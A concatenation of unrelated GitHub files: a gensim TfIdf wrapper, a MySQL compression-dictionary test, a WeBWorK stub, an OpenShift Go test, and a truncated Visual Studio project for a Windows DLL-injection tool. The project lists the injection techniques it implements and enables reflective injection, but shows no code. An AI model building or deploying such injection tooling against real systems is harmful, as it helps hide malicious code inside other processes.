            Function for local weighting, default for `wlocal` is :func:`~gensim.utils.identity` which does nothing.
            Other options include :func:`math.sqrt`, :func:`math.log1p`, etc.
        wglobal : function, optional
            Function for global weighting, default is :func:`~gensim.models.tfidfmodel.df2idf`.
        normalize : bool, optional
            It dictates how the final transformed vectors will be normalized. `normalize=True` means set to unit length
            (default); `False` means don't normalize. You can also set `normalize` to your own function that accepts
            and returns a sparse vector.
        smartirs : str, optional
            SMART (System for the Mechanical Analysis and Retrieval of Text) Information Retrieval System,
            a mnemonic scheme for denoting tf-idf weighting variants in the vector space model.
            The mnemonic for representing a combination of weights takes the form XYZ,
            for example 'ntc', 'bpn' and so on, where the letters represents the term weighting of the document vector.
            local_letter : str
                Term frequency weighing, one of:
                    * `b` - binary,
                    * `t` or `n` - raw,
                    * `a` - augmented,
                    * `l` - logarithm,
                    * `d` - double logarithm,
                    * `L` - log average.
            global_letter : str
                Document frequency weighting, one of:
                    * `x` or `n` - none,
                    * `f` - idf,
                    * `t` - zero-corrected idf,
                    * `p` - probabilistic idf.
            normalization_letter : str
                Document normalization, one of:
                    * `x` or `n` - none,
                    * `c` - cosine,
                    * `u` - pivoted unique,
                    * `b` - pivoted character length.
            Default is `nfc`.
            For more info, visit `"Wikipedia" <https://en.wikipedia.org/wiki/SMART_Information_Retrieval_System>`_.
        pivot : float, optional
            It is the point around which the regular normalization curve is `tilted` to get the new pivoted
            normalization curve. In the paper `Amit Singhal, Chris Buckley, Mandar Mitra:
            "Pivoted Document Length Normalization" <http://singhal.info/pivoted-dln.pdf>`_ it is the point where the
            retrieval and relevance curves intersect.
            This parameter along with `slope` is used for pivoted document length normalization.
            When `pivot` is None, `smartirs` specifies the pivoted unique document normalization scheme, and either
            `corpus` or `dictionary` are specified, then the pivot will be determined automatically. Otherwise, no
            pivoted document length normalization is applied.
        slope : float, optional
            It is the parameter required by pivoted document length normalization which determines the slope to which
            the `old normalization` can be tilted. This parameter only works when pivot is defined by user and is not
            None.
        See Also
        --------
        ~gensim.models.tfidfmodel.TfidfModel : Class that also uses the SMART scheme.
        ~gensim.models.tfidfmodel.resolve_weights : Function that also uses the SMART scheme.
        """
        # The wrapped gensim model; populated by fit().
        self.gensim_model = None
        self.id2word = id2word
        self.dictionary = dictionary
        self.wlocal = wlocal
        self.wglobal = wglobal
        self.normalize = normalize
        self.smartirs = smartirs
        self.slope = slope
        self.pivot = pivot
    def fit(self, X, y=None):
        """Fit the model according to the given training data.
        Parameters
        ----------
        X : iterable of iterable of (int, int)
            Input corpus
        Returns
        -------
        :class:`~gensim.sklearn_api.tfidf.TfIdfTransformer`
            The trained model.
        """
        self.gensim_model = TfidfModel(
            corpus=X, id2word=self.id2word, dictionary=self.dictionary, wlocal=self.wlocal,
            wglobal=self.wglobal, normalize=self.normalize, smartirs=self.smartirs,
            pivot=self.pivot, slope=self.slope
        )
        return self
    def transform(self, docs):
        """Get the tf-idf scores in BoW representation for `docs`
        Parameters
        ----------
        docs: {iterable of list of (int, number), list of (int, number)}
            Document or corpus in BoW format.
        Returns
        -------
        iterable of list (int, float) 2-tuples.
            The BOW representation of each document. Will have the same shape as `docs`.
        """
        if self.gensim_model is None:
            raise NotFittedError(
                "This model has not been fitted yet. Call 'fit' with appropriate arguments before using this method."
            )
        # An empty corpus transforms to an empty corpus.  Guard it explicitly:
        # the single-document check below indexes docs[0] and would otherwise
        # raise IndexError on empty input.
        if not docs:
            return []
        # input as python lists
        if isinstance(docs[0], tuple):
            docs = [docs]
        return [self.gensim_model[doc] for doc in docs]
| {
"pile_set_name": "Github"
} |
SET @numbers = 'one' 'two' 'three' 'four';
# define a stored procedure which would create a compression dictionary
DELIMITER //;
CREATE PROCEDURE create_zip_dict(IN data TEXT)
BEGIN
  SET @data_var = data;
  CREATE COMPRESSION_DICTIONARY dict(@data_var);
END //
DELIMITER ;//
# define a stored procedure which would create a new table referencing
# a compression dictionary
DELIMITER //;
CREATE PROCEDURE create_table_referencing_zip_dict()
BEGIN
  CREATE TABLE t1(
    id INT,
    a BLOB COLUMN_FORMAT COMPRESSED WITH COMPRESSION_DICTIONARY dict
  ) ENGINE=InnoDB;
END //
DELIMITER ;//
# execute both procedures defined above
CALL create_zip_dict(@numbers);
CALL create_table_referencing_zip_dict();
# check if corresponding records were added to 'compression_dictionary' and
# 'compression_dictionary_tables' tables in 'information_schema'.
#
SELECT dict_data = @numbers AS zip_dict_data_match FROM information_schema.compression_dictionary WHERE dict_name = 'dict';
SELECT dict_name = 'dict' AS dict_names_match FROM information_schema.compression_dictionary_tables
WHERE TABLE_SCHEMA=DATABASE() AND TABLE_NAME = 't1' AND COLUMN_NAME = 'a';
# define a stored procedure which would create both a compression dictionary
# and a table referencing it inside a single call
DELIMITER //;
CREATE PROCEDURE create_zip_dict_and_table(IN data TEXT)
BEGIN
  SET @data_var = data;
  CREATE COMPRESSION_DICTIONARY another_dict(@data_var);
  CREATE TABLE t2(
    id INT,
    a BLOB COLUMN_FORMAT COMPRESSED WITH COMPRESSION_DICTIONARY another_dict
  ) ENGINE=InnoDB;
END //
DELIMITER ;//
# call this procedure
CALL create_zip_dict_and_table(@numbers);
# check if corresponding records were added to 'compression_dictionary' and
# 'compression_dictionary_tables' tables in 'information_schema' for the
# compression dictionary and table created by 'create_zip_dict_and_table()' .
SELECT dict_data = @numbers AS another_zip_dict_data_match FROM information_schema.compression_dictionary WHERE dict_name = 'another_dict';
# NOTE(review): this check previously filtered on TABLE_NAME = 'antoher_dict'
# (a typo), which matches no rows and made the check vacuous.  The table
# created by create_zip_dict_and_table() is 't2', mirroring the 't1' check
# above.  The recorded .result file must be re-recorded to match.
SELECT dict_name= 'another_dict' AS another_dict_names_match FROM information_schema.compression_dictionary_tables
WHERE TABLE_SCHEMA=DATABASE() AND TABLE_NAME = 't2' AND COLUMN_NAME = 'a';
# define a JSON-formatted value
SET @json_value =
  '[\n'
  '  {\n'
  '    "one" = 0,\n'
  '    "two" = 0,\n'
  '    "three" = 0,\n'
  '    "four" = 0\n'
  '  },\n'
  '  {\n'
  '    "one" = 0,\n'
  '    "two" = 0,\n'
  '    "three" = 0,\n'
  '    "four" = 0\n'
  '  },\n'
  '  {\n'
  '    "one" = 0,\n'
  '    "two" = 0,\n'
  '    "three" = 0,\n'
  '    "four" = 0\n'
  '  },\n'
  '  {\n'
  '    "one" = 0,\n'
  '    "two" = 0,\n'
  '    "three" = 0,\n'
  '    "four" = 0\n'
  '  }\n'
  ']\n'
;
# define a stored procedure which would insert a record into
# the first table
DELIMITER //;
CREATE PROCEDURE insert_zip_record(IN id INT, IN data TEXT)
BEGIN
  INSERT INTO t1 VALUES(id, data);
END //
DELIMITER ;//
# call record insertion stored procedure
CALL insert_zip_record(1, @json_value);
# define a function which would return MD5 hash of the BLOB
# by the given id
DELIMITER //;
CREATE FUNCTION get_zip_record_hash(k INT) RETURNS CHAR(32) READS SQL DATA
BEGIN
  DECLARE res CHAR(32);
  DECLARE found INT DEFAULT TRUE;
  DECLARE cur CURSOR FOR SELECT MD5(a) FROM t1 WHERE id = k;
  DECLARE CONTINUE HANDLER FOR NOT FOUND SET found = FALSE;
  OPEN cur;
  FETCH cur INTO res;
  IF NOT found THEN
    SET res = REPEAT('x', 32);
  END IF;
  CLOSE cur;
  RETURN res;
END //
DELIMITER ;//
# calculate MD5 hash of the BLOB directly from the first table
SELECT MD5(a) INTO @expected_hash_value FROM t1 WHERE id = 1;
# call the function and check if it returns expected result
SELECT get_zip_record_hash(1) = @expected_hash_value AS hash_values_match;
# define a stored procedure which would delete a record from
# the first table by the given id
DELIMITER //;
CREATE PROCEDURE delete_zip_record(k INT)
BEGIN
  DELETE FROM t1 WHERE id = k;
END //
DELIMITER ;//
# call record deletion stored procedure
CALL delete_zip_record(1);
# call the function 'get_zip_record_hash()' and check if it returns special
# value
SELECT get_zip_record_hash(1) = REPEAT('x', 32) AS hash_values_match;
# define a stored procedure which would remove tables and compression
# dictionaries created earlier
DELIMITER //;
CREATE PROCEDURE remove_zip_dicts_and_tables()
BEGIN
  DROP TABLE t1, t2;
  DROP COMPRESSION_DICTIONARY dict;
  DROP COMPRESSION_DICTIONARY another_dict;
END //
DELIMITER ;//
# call clenup procedure
CALL remove_zip_dicts_and_tables();
# make sure that the changes are reflected in 'information_schema'
SELECT COUNT(*) = 0 AS dictionary_references_removed FROM information_schema.compression_dictionary_tables WHERE table_name IN ('t1', 't2');
SELECT COUNT(*) = 0 AS dictionaries_removed FROM information_schema.compression_dictionary WHERE dict_name IN ('dict', 'another_dict');
# remove stored procedures created earlier
DROP PROCEDURE create_zip_dict;
DROP PROCEDURE create_table_referencing_zip_dict;
DROP PROCEDURE create_zip_dict_and_table;
DROP PROCEDURE insert_zip_record;
DROP FUNCTION get_zip_record_hash;
DROP PROCEDURE delete_zip_record;
DROP PROCEDURE remove_zip_dicts_and_tables;
# create a compression dictionary using prepared statement
SET @create_zip_dict_sql = CONCAT('CREATE COMPRESSION_DICTIONARY dict(\'', @numbers, '\');');
PREPARE create_zip_dict_stmt FROM @create_zip_dict_sql;
EXECUTE create_zip_dict_stmt;
DEALLOCATE PREPARE create_zip_dict_stmt;
# create a table referencing a compression dictionary using prepared statement
SET @create_table_referencing_zip_dict_sql =
  'CREATE TABLE t1('
  '  id INT,'
  '  a BLOB COLUMN_FORMAT COMPRESSED WITH COMPRESSION_DICTIONARY dict'
  ') ENGINE=InnoDB;'
;
PREPARE create_table_referencing_zip_dict_stmt FROM @create_table_referencing_zip_dict_sql;
EXECUTE create_table_referencing_zip_dict_stmt;
DEALLOCATE PREPARE create_table_referencing_zip_dict_stmt;
# make sure new records appear in the 'information_schema'
SELECT dict_data = @numbers AS zip_dict_data_match FROM information_schema.compression_dictionary WHERE dict_name = 'dict';
SELECT dict_name = 'dict' AS dict_names_match FROM information_schema.compression_dictionary_tables
WHERE TABLE_SCHEMA = DATABASE() AND TABLE_NAME = 't1' AND COLUMN_NAME = 'a';
# insert a record into the first table using prepared statement
PREPARE insert_zip_record_stmt FROM 'INSERT INTO t1 VALUES(?, ?);';
SET @blob_key = 1;
EXECUTE insert_zip_record_stmt USING @blob_key, @json_value;
DEALLOCATE PREPARE insert_zip_record_stmt;
# calculate MD5 hash of the BLOB directly from the first table
SELECT MD5(a) INTO @expected_hash_value FROM t1 WHERE id = 1;
# get MD5 hash of the BLOB by the given id using prepared statement
PREPARE get_zip_record_hash_stmt FROM 'SELECT IF(COUNT(*) = 0, REPEAT(\'x\', 32), MD5(MAX(a))) INTO @ps_hash_value FROM t1 WHERE id = ?;';
EXECUTE get_zip_record_hash_stmt USING @blob_key;
SELECT @ps_hash_value = @expected_hash_value AS hash_values_match;
# delete a record from the first table using prepared statement
PREPARE delete_zip_record_stmt FROM 'DELETE FROM t1 WHERE id = ?;';
EXECUTE delete_zip_record_stmt USING @blob_key;
DEALLOCATE PREPARE delete_zip_record_stmt;
# get special value for MD5 hash from the 'get_zip_record_hash_stmt()'
# prepared statement after deletion
EXECUTE get_zip_record_hash_stmt USING @blob_key;
DEALLOCATE PREPARE get_zip_record_hash_stmt;
SELECT @ps_hash_value = REPEAT('x', 32) AS hash_values_match;
# remove the table created by 'create_table_referencing_zip_dict_stmt()'
# using prepared statement
PREPARE remove_table_referencing_zip_dict_stmt FROM 'DROP TABLE t1';
EXECUTE remove_table_referencing_zip_dict_stmt;
DEALLOCATE PREPARE remove_table_referencing_zip_dict_stmt;
# remove the compression dictionary created by 'create_zip_dict_stmt()'
# using prepared statement
PREPARE remove_zip_dict_stmt FROM 'DROP COMPRESSION_DICTIONARY dict;';
EXECUTE remove_zip_dict_stmt;
DEALLOCATE PREPARE remove_zip_dict_stmt;
# make sure that the changes are reflected in 'information_schema'
#
SELECT COUNT(*) = 0 AS dictionary_references_removed FROM information_schema.compression_dictionary_tables WHERE table_name IN ('t1', 't2');
SELECT COUNT(*) = 0 AS dictionaries_removed FROM information_schema.compression_dictionary WHERE dict_name IN ('dict', 'another_dict');
| {
"pile_set_name": "Github"
} |
# This file is just a pointer to the file
#
# "Library/ASU-topics/setStat/dueck13_2_3.pg"
#
# You may want to change your problem set to use that problem
# directly, especially if you want to make a copy of the problem
# for modification.
DOCUMENT();
# Render the referenced library problem in place of this stub.
includePGproblem("Library/ASU-topics/setStat/dueck13_2_3.pg");
ENDDOCUMENT();
## These tags keep this problem from being added to the NPL database
##
## DBsubject('ZZZ-Inserted Text')
## DBchapter('ZZZ-Inserted Text')
## DBsection('ZZZ-Inserted Text')
"pile_set_name": "Github"
} |
package policy
import (
"bytes"
"reflect"
"testing"
"k8s.io/apimachinery/pkg/runtime"
clientgotesting "k8s.io/client-go/testing"
kapi "k8s.io/kubernetes/pkg/api"
authorizationapi "github.com/openshift/origin/pkg/authorization/apis/authorization"
securityapi "github.com/openshift/origin/pkg/security/apis/security"
securityfakeclient "github.com/openshift/origin/pkg/security/generated/internalclientset/fake"
)
// TestModifySCC exercises SCCModificationOptions.AddSCC/RemoveSCC against a
// fake client, checking the resulting user and group membership on the SCC
// for users, service accounts, and groups, with and without overlap.
func TestModifySCC(t *testing.T) {
	tests := map[string]struct {
		startingSCC *securityapi.SecurityContextConstraints // SCC served by the fake "get" reactor
		subjects    []kapi.ObjectReference                  // subjects passed to Add/Remove
		expectedSCC *securityapi.SecurityContextConstraints // SCC expected in the "update" call
		remove      bool                                    // true -> RemoveSCC, false -> AddSCC
	}{
		"add-user-to-empty": {
			startingSCC: &securityapi.SecurityContextConstraints{},
			subjects:    []kapi.ObjectReference{{Name: "one", Kind: authorizationapi.UserKind}, {Name: "two", Kind: authorizationapi.UserKind}},
			expectedSCC: &securityapi.SecurityContextConstraints{Users: []string{"one", "two"}},
			remove:      false,
		},
		"add-user-to-existing": {
			startingSCC: &securityapi.SecurityContextConstraints{Users: []string{"one"}},
			subjects:    []kapi.ObjectReference{{Name: "two", Kind: authorizationapi.UserKind}},
			expectedSCC: &securityapi.SecurityContextConstraints{Users: []string{"one", "two"}},
			remove:      false,
		},
		"add-user-to-existing-with-overlap": {
			startingSCC: &securityapi.SecurityContextConstraints{Users: []string{"one"}},
			subjects:    []kapi.ObjectReference{{Name: "one", Kind: authorizationapi.UserKind}, {Name: "two", Kind: authorizationapi.UserKind}},
			expectedSCC: &securityapi.SecurityContextConstraints{Users: []string{"one", "two"}},
			remove:      false,
		},
		"add-sa-to-empty": {
			startingSCC: &securityapi.SecurityContextConstraints{},
			subjects:    []kapi.ObjectReference{{Namespace: "a", Name: "one", Kind: authorizationapi.ServiceAccountKind}, {Namespace: "b", Name: "two", Kind: authorizationapi.ServiceAccountKind}},
			expectedSCC: &securityapi.SecurityContextConstraints{Users: []string{"system:serviceaccount:a:one", "system:serviceaccount:b:two"}},
			remove:      false,
		},
		"add-sa-to-existing": {
			startingSCC: &securityapi.SecurityContextConstraints{Users: []string{"one"}},
			subjects:    []kapi.ObjectReference{{Namespace: "b", Name: "two", Kind: authorizationapi.ServiceAccountKind}},
			expectedSCC: &securityapi.SecurityContextConstraints{Users: []string{"one", "system:serviceaccount:b:two"}},
			remove:      false,
		},
		"add-sa-to-existing-with-overlap": {
			startingSCC: &securityapi.SecurityContextConstraints{Users: []string{"system:serviceaccount:a:one"}},
			subjects:    []kapi.ObjectReference{{Namespace: "a", Name: "one", Kind: authorizationapi.ServiceAccountKind}, {Namespace: "b", Name: "two", Kind: authorizationapi.ServiceAccountKind}},
			expectedSCC: &securityapi.SecurityContextConstraints{Users: []string{"system:serviceaccount:a:one", "system:serviceaccount:b:two"}},
			remove:      false,
		},
		"add-group-to-empty": {
			startingSCC: &securityapi.SecurityContextConstraints{},
			subjects:    []kapi.ObjectReference{{Name: "one", Kind: authorizationapi.GroupKind}, {Name: "two", Kind: authorizationapi.GroupKind}},
			expectedSCC: &securityapi.SecurityContextConstraints{Groups: []string{"one", "two"}},
			remove:      false,
		},
		"add-group-to-existing": {
			startingSCC: &securityapi.SecurityContextConstraints{Groups: []string{"one"}},
			subjects:    []kapi.ObjectReference{{Name: "two", Kind: authorizationapi.GroupKind}},
			expectedSCC: &securityapi.SecurityContextConstraints{Groups: []string{"one", "two"}},
			remove:      false,
		},
		"add-group-to-existing-with-overlap": {
			startingSCC: &securityapi.SecurityContextConstraints{Groups: []string{"one"}},
			subjects:    []kapi.ObjectReference{{Name: "one", Kind: authorizationapi.GroupKind}, {Name: "two", Kind: authorizationapi.GroupKind}},
			expectedSCC: &securityapi.SecurityContextConstraints{Groups: []string{"one", "two"}},
			remove:      false,
		},
		"remove-user": {
			startingSCC: &securityapi.SecurityContextConstraints{Users: []string{"one", "two"}},
			subjects:    []kapi.ObjectReference{{Name: "one", Kind: authorizationapi.UserKind}, {Name: "two", Kind: authorizationapi.UserKind}},
			expectedSCC: &securityapi.SecurityContextConstraints{},
			remove:      true,
		},
		"remove-user-from-existing-with-overlap": {
			startingSCC: &securityapi.SecurityContextConstraints{Users: []string{"one", "two"}},
			subjects:    []kapi.ObjectReference{{Name: "two", Kind: authorizationapi.UserKind}},
			expectedSCC: &securityapi.SecurityContextConstraints{Users: []string{"one"}},
			remove:      true,
		},
		"remove-sa": {
			startingSCC: &securityapi.SecurityContextConstraints{Users: []string{"system:serviceaccount:a:one", "system:serviceaccount:b:two"}},
			subjects:    []kapi.ObjectReference{{Namespace: "a", Name: "one", Kind: authorizationapi.ServiceAccountKind}, {Namespace: "b", Name: "two", Kind: authorizationapi.ServiceAccountKind}},
			expectedSCC: &securityapi.SecurityContextConstraints{},
			remove:      true,
		},
		"remove-sa-from-existing-with-overlap": {
			startingSCC: &securityapi.SecurityContextConstraints{Users: []string{"system:serviceaccount:a:one", "system:serviceaccount:b:two"}},
			subjects:    []kapi.ObjectReference{{Namespace: "b", Name: "two", Kind: authorizationapi.ServiceAccountKind}},
			expectedSCC: &securityapi.SecurityContextConstraints{Users: []string{"system:serviceaccount:a:one"}},
			remove:      true,
		},
		"remove-group": {
			startingSCC: &securityapi.SecurityContextConstraints{Groups: []string{"one", "two"}},
			subjects:    []kapi.ObjectReference{{Name: "one", Kind: authorizationapi.GroupKind}, {Name: "two", Kind: authorizationapi.GroupKind}},
			expectedSCC: &securityapi.SecurityContextConstraints{},
			remove:      true,
		},
		"remove-group-from-existing-with-overlap": {
			startingSCC: &securityapi.SecurityContextConstraints{Groups: []string{"one", "two"}},
			subjects:    []kapi.ObjectReference{{Name: "two", Kind: authorizationapi.GroupKind}},
			expectedSCC: &securityapi.SecurityContextConstraints{Groups: []string{"one"}},
			remove:      true,
		},
	}

	for tcName, tc := range tests {
		tc := tc // pin the range variable captured by the reactor closures (pre-Go 1.22 semantics)
		fakeClient := securityfakeclient.NewSimpleClientset()
		fakeClient.Fake.PrependReactor("get", "securitycontextconstraints", func(action clientgotesting.Action) (handled bool, ret runtime.Object, err error) {
			return true, tc.startingSCC, nil
		})
		var actualSCC *securityapi.SecurityContextConstraints
		fakeClient.Fake.PrependReactor("update", "securitycontextconstraints", func(action clientgotesting.Action) (handled bool, ret runtime.Object, err error) {
			actualSCC = action.(clientgotesting.UpdateAction).GetObject().(*securityapi.SecurityContextConstraints)
			return true, actualSCC, nil
		})

		o := &SCCModificationOptions{
			SCCName:                 "foo",
			SCCInterface:            fakeClient.Security().SecurityContextConstraints(),
			DefaultSubjectNamespace: "",
			Subjects:                tc.subjects,

			Out: &bytes.Buffer{},
		}

		var err error
		if tc.remove {
			err = o.RemoveSCC()
		} else {
			err = o.AddSCC()
		}
		if err != nil {
			t.Errorf("%s: unexpected err %v", tcName, err)
			continue // the update never completed; the comparisons below are meaningless
		}
		if actualSCC == nil {
			// Fix: previously a missing update call panicked with a nil
			// dereference in the comparisons instead of failing cleanly.
			t.Errorf("%s: update reactor was never invoked", tcName)
			continue
		}
		if e, a := tc.expectedSCC.Users, actualSCC.Users; !reflect.DeepEqual(e, a) {
			t.Errorf("%s: expected %v, actual %v", tcName, e, a)
		}
		if e, a := tc.expectedSCC.Groups, actualSCC.Groups; !reflect.DeepEqual(e, a) {
			t.Errorf("%s: expected %v, actual %v", tcName, e, a)
		}
	}
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- Visual C++ project (VS2013 / v120 toolset) for the injectAllTheThings
       console tool, built for x86 (Win32) and x64 in Debug and Release. -->
  <ItemGroup Label="ProjectConfigurations">
    <ProjectConfiguration Include="Debug|Win32">
      <Configuration>Debug</Configuration>
      <Platform>Win32</Platform>
    </ProjectConfiguration>
    <ProjectConfiguration Include="Debug|x64">
      <Configuration>Debug</Configuration>
      <Platform>x64</Platform>
    </ProjectConfiguration>
    <ProjectConfiguration Include="Release|Win32">
      <Configuration>Release</Configuration>
      <Platform>Win32</Platform>
    </ProjectConfiguration>
    <ProjectConfiguration Include="Release|x64">
      <Configuration>Release</Configuration>
      <Platform>x64</Platform>
    </ProjectConfiguration>
  </ItemGroup>
  <PropertyGroup Label="Globals">
    <ProjectGuid>{57930B58-FE07-422A-BA81-636AAE3525B6}</ProjectGuid>
    <Keyword>Win32Proj</Keyword>
    <RootNamespace>injectAllTheThings</RootNamespace>
  </PropertyGroup>
  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
  <!-- Per-configuration application settings: all configurations build a
       Unicode console Application with the v120 toolset; Release also
       enables whole-program optimization. -->
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
    <ConfigurationType>Application</ConfigurationType>
    <UseDebugLibraries>true</UseDebugLibraries>
    <PlatformToolset>v120</PlatformToolset>
    <CharacterSet>Unicode</CharacterSet>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
    <ConfigurationType>Application</ConfigurationType>
    <UseDebugLibraries>true</UseDebugLibraries>
    <PlatformToolset>v120</PlatformToolset>
    <CharacterSet>Unicode</CharacterSet>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
    <ConfigurationType>Application</ConfigurationType>
    <UseDebugLibraries>false</UseDebugLibraries>
    <PlatformToolset>v120</PlatformToolset>
    <WholeProgramOptimization>true</WholeProgramOptimization>
    <CharacterSet>Unicode</CharacterSet>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
    <ConfigurationType>Application</ConfigurationType>
    <UseDebugLibraries>false</UseDebugLibraries>
    <PlatformToolset>v120</PlatformToolset>
    <WholeProgramOptimization>true</WholeProgramOptimization>
    <CharacterSet>Unicode</CharacterSet>
  </PropertyGroup>
  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
  <ImportGroup Label="ExtensionSettings">
  </ImportGroup>
  <!-- Standard user property sheets, one ImportGroup per configuration. -->
  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
  </ImportGroup>
  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
  </ImportGroup>
  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
  </ImportGroup>
  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
  </ImportGroup>
  <PropertyGroup Label="UserMacros" />
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
    <LinkIncremental>true</LinkIncremental>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
    <LinkIncremental>true</LinkIncremental>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
    <LinkIncremental>false</LinkIncremental>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
    <LinkIncremental>false</LinkIncremental>
  </PropertyGroup>
  <!-- Compile/link settings per configuration. Every configuration defines
       the Reflective DLL Injection macros (REFLECTIVE_DLL_EXPORTS etc.) and
       an architecture macro (WIN_X86 / WIN_X64); the post-build step copies
       the built EXE into ..\bin with a _32 or _64 suffix. -->
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
    <ClCompile>
      <PrecompiledHeader>
      </PrecompiledHeader>
      <WarningLevel>Level3</WarningLevel>
      <Optimization>Disabled</Optimization>
      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;_LIB;WIN_X86;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
    </ClCompile>
    <Link>
      <SubSystem>Console</SubSystem>
      <GenerateDebugInformation>true</GenerateDebugInformation>
    </Link>
    <PostBuildEvent>
      <Command>copy ..\Debug\injectAllTheThings.exe ..\bin\injectAllTheThings_32.exe</Command>
    </PostBuildEvent>
  </ItemDefinitionGroup>
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
    <ClCompile>
      <PrecompiledHeader>
      </PrecompiledHeader>
      <WarningLevel>Level3</WarningLevel>
      <Optimization>Disabled</Optimization>
      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;_LIB;WIN_X64;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
    </ClCompile>
    <Link>
      <SubSystem>Console</SubSystem>
      <GenerateDebugInformation>true</GenerateDebugInformation>
    </Link>
    <PostBuildEvent>
      <Command>copy ..\x64\Debug\injectAllTheThings.exe ..\bin\injectAllTheThings_64.exe</Command>
    </PostBuildEvent>
  </ItemDefinitionGroup>
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
    <ClCompile>
      <WarningLevel>Level3</WarningLevel>
      <PrecompiledHeader>
      </PrecompiledHeader>
      <Optimization>MaxSpeed</Optimization>
      <FunctionLevelLinking>true</FunctionLevelLinking>
      <IntrinsicFunctions>true</IntrinsicFunctions>
      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;_LIB;WIN_X86;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
    </ClCompile>
    <Link>
      <SubSystem>Console</SubSystem>
      <GenerateDebugInformation>true</GenerateDebugInformation>
      <EnableCOMDATFolding>true</EnableCOMDATFolding>
      <OptimizeReferences>true</OptimizeReferences>
    </Link>
    <PostBuildEvent>
      <Command>copy ..\Release\injectAllTheThings.exe ..\bin\injectAllTheThings_32.exe</Command>
    </PostBuildEvent>
  </ItemDefinitionGroup>
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
    <ClCompile>
      <WarningLevel>Level3</WarningLevel>
      <PrecompiledHeader>
      </PrecompiledHeader>
      <Optimization>MaxSpeed</Optimization>
      <FunctionLevelLinking>true</FunctionLevelLinking>
      <IntrinsicFunctions>true</IntrinsicFunctions>
      <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;_LIB;WIN_X64;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;%(PreprocessorDefinitions)</PreprocessorDefinitions>
    </ClCompile>
    <Link>
      <SubSystem>Console</SubSystem>
      <GenerateDebugInformation>true</GenerateDebugInformation>
      <EnableCOMDATFolding>true</EnableCOMDATFolding>
      <OptimizeReferences>true</OptimizeReferences>
    </Link>
    <PostBuildEvent>
      <Command>copy ..\x64\Release\injectAllTheThings.exe ..\bin\injectAllTheThings_64.exe</Command>
    </PostBuildEvent>
  </ItemDefinitionGroup>
  <!-- Sources: one t_*.cpp per injection technique, plus the reflective
       loader pair (GetProcAddressR / LoadLibraryR). -->
  <ItemGroup>
    <ClCompile Include="auxiliary.cpp" />
    <ClCompile Include="GetProcAddressR.c" />
    <ClCompile Include="LoadLibraryR.c" />
    <ClCompile Include="main.cpp" />
    <ClCompile Include="t_CreateRemoteThread.cpp" />
    <ClCompile Include="t_NtCreateThreadEx.cpp" />
    <ClCompile Include="t_QueueUserAPC.cpp" />
    <ClCompile Include="t_ReflectiveDllInjection.cpp" />
    <ClCompile Include="t_RtlCreateUserThread.cpp" />
    <ClCompile Include="t_SetWindowsHookEx.cpp" />
    <ClCompile Include="t_suspendInjectResume.cpp" />
  </ItemGroup>
  <ItemGroup>
    <ClInclude Include="auxiliary.h" />
    <ClInclude Include="fheaders.h" />
    <ClInclude Include="GetProcAddressR.h" />
    <ClInclude Include="LoadLibraryR.h" />
